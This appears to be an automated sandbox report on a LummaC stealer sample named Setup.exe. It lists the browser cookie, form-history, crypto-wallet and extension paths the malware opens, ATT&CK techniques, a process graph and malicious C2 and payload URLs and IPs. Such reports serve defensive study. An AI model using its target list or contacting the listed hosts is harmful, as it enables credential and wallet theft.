          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7084, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		11
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		1
          Create Account          		11
          DLL Side-Loading          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory11
          File and Directory Discovery          		Remote Desktop Protocol31
          Data from Local System          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		1
          Scheduled Task/Job          		212
          Process Injection          		1
          Abuse Elevation Control Mechanism          		Security Account Manager265
          System Information Discovery          		SMB/Windows Admin Shares1
          Screen Capture          		1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          Scheduled Task/Job          		1
          Registry Run Keys / Startup Folder          		1
          Scheduled Task/Job          		3
          Obfuscated Files or Information          		NTDS451
          Security Software Discovery          		Distributed Component Object Model2
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud Accounts1
          PowerShell          		Network Logon Script1
          Registry Run Keys / Startup Folder          		11
          DLL Side-Loading          		LSA Secrets12
          Virtualization/Sandbox Evasion          		SSHKeylogging114
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
          Masquerading          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Virtualization/Sandbox Evasion          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557280 Sample: Setup.exe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 44 sliperyedhby.icu 2->44 46 steamcommunity.com 2->46 48 cdn1.pixel-story.shop 2->48 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 9 other signatures 2->60 10 Setup.exe 2 2->10         started        signatures3 process4 signatures5 70 Maps a DLL or memory area into another process 10->70 72 Tries to detect virtualization through RDTSC time measurements 10->72 74 Switches to a custom stack to bypass stack traces 10->74 76 Found direct / indirect Syscall (likely to bypass EDR) 10->76 13 choice.exe 3 10->13         started        process6 file7 38 C:\Users\user\AppData\Local\Temp\cbaxoydi, PE32 13->38 dropped 78 Writes to foreign memory regions 13->78 80 Found hidden mapped module (file has been removed from disk) 13->80 82 Maps a DLL or memory area into another process 13->82 84 2 other signatures 13->84 17 msiexec.exe 2 13->17         started        22 conhost.exe 13->22         started        signatures8 process9 dnsIp10 40 sliperyedhby.icu 172.67.131.254, 443, 49704, 49706 CLOUDFLARENETUS United States 17->40 42 cdn1.pixel-story.shop 172.67.185.54, 443, 49715, 49716 CLOUDFLARENETUS United States 17->42 34 C:\Users\user\AppData\Roaming\7LUEA3.pif, PE32 17->34 dropped 62 Query firmware table information (likely to detect VMs) 17->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 17->64 66 Drops PE files with a suspicious file extension 17->66 68 3 other signatures 17->68 24 7LUEA3.pif 1 4 17->24         started        file11 signatures12 process13 file14 36 C:\dfbffdd\AutoIt3.exe, PE32 24->36 dropped 27 InstallUtil.exe 24->27         started        30 InstallUtil.exe 24->30         started        32 InstallUtil.exe 24->32         started        process15 dnsIp16 50 62.60.234.80, 1466, 49719, 49721 ASLINE-AS-APASLINELIMITEDHK Iran (ISLAMIC Republic Of) 27->50 52 steamcommunity.com 104.102.49.254, 443, 49718 AKAMAI-ASUS United States 27->52

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Setup.exe29%ReversingLabsWin32.Trojan.Leonem

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\cbaxoydi100%AviraHEUR/AGEN.1316118
          C:\Users\user\AppData\Local\Temp\cbaxoydi100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\cbaxoydi66%ReversingLabsWin32.Spyware.Lummastealer
          C:\Users\user\AppData\Roaming\7LUEA3.pif0%ReversingLabs
          C:\dfbffdd\AutoIt3.exe0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.valvesoftware.com/legal.htmhttps://store.steampowered.com/steam_refunds/responsive_page_m0%Avira URL Cloudsafe
          https://cdn1.pixel-story.shop/ldr_cp_pa05c5df6HOMEDRIVE=C:HOMEPATH=100%Avira URL Cloudmalware
          https://cdn1.pixel-story.shop/runcl.bin100%Avira URL Cloudmalware
          http://crl.microsoft;0%Avira URL Cloudsafe
          https://sliperyedhby.icu/V10%Avira URL Cloudsafe
          https://sliperyedhby.icu/api0%Avira URL Cloudsafe
          https://cdn1.pixel-story.shop/clp_pa.32n100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          steamcommunity.com
          		104.102.49.254
          		truefalse
            		high
            cdn1.pixel-story.shop
            		172.67.185.54
            		truefalse
              		high
              sliperyedhby.icu
              		172.67.131.254
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cdn1.pixel-story.shop/runcl.binfalse
                • Avira URL Cloud: malware
                		unknown
                thicktoys.sbsfalse
                  		high
                  faintbl0w.sbsfalse
                    		high
                    https://steamcommunity.com/profiles/76561198043764602false
                      		high
                      3xc1aimbl0w.sbsfalse
                        		high
                        https://sliperyedhby.icu/apitrue
                        • Avira URL Cloud: safe
                        		unknown
                        300snails.sbsfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb.jpghttps://communityInstallUtil.exe, 0000000F.00000002.2492246626.0000000001856000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://player.vimeo.comInstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://steamcommunity.com/discussions/https://steamcommunity.com/workshop/https://steamcommunity.coInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.vmware.com/0Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&amp;l=englishInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://steamcommunity.com/?subsection=broadcastsInstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://steamcommunity.com/profiles/76561198043764602/badgesInstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&l=enInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://shared.fastly.steamstatic.com/store_item_assets/steam/apps/34830/capsule_184x69.jpg?t=172837InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://store.steampowered.com/subscriber_agreement/InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.gstatic.cn/recaptcha/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://steamcommunity.com/login/home/?goto=profiles%2F76561198043764602InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.autoitscript.com/autoit3/7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drfalse
                                                          		high
                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=2idoEWbwInstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=LTFwInstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/?subsection=broadcastshttps://store.steampowered.com/privacy_agreement/htInstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.valvesoftware.com/legal.htmInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.youtube.comInstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.fastly.steamstatic.com/public/images/badges/13_gamecollector/1_54.png?v=4InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://shared.fastly.steamstatic.com/store_item_assets/steam/apps/40100/capsule_184x69.jpg?t=163673InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://steamcommunity.com/profiles/76561198043764602https://steamcommunity.com/profiles/76561198257InstallUtil.exe, 0000000F.00000002.2492246626.000000000190C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.comInstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.valvesoftware.com/legal.htmhttps://store.steampowered.com/steam_refunds/responsive_page_mInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://steamcommunity.com/profiles/76561198043764602/inventory/profile_recentgame_headerInstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&amp;l=englishInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn1.pixel-story.shop/ldr_cp_pa05c5df6HOMEDRIVE=C:HOMEPATH=msiexec.exe, 00000005.00000003.1582101958.0000000003568000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.0000000003570000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1582519453.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&amp;l=englInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6InstallUtil.exe, 0000000F.00000002.2492246626.00000000018BE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://steamcommunity.com/profiles/76561198043764602/stats/40100/achievements/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&l=eInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://s.ytimg.com;InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
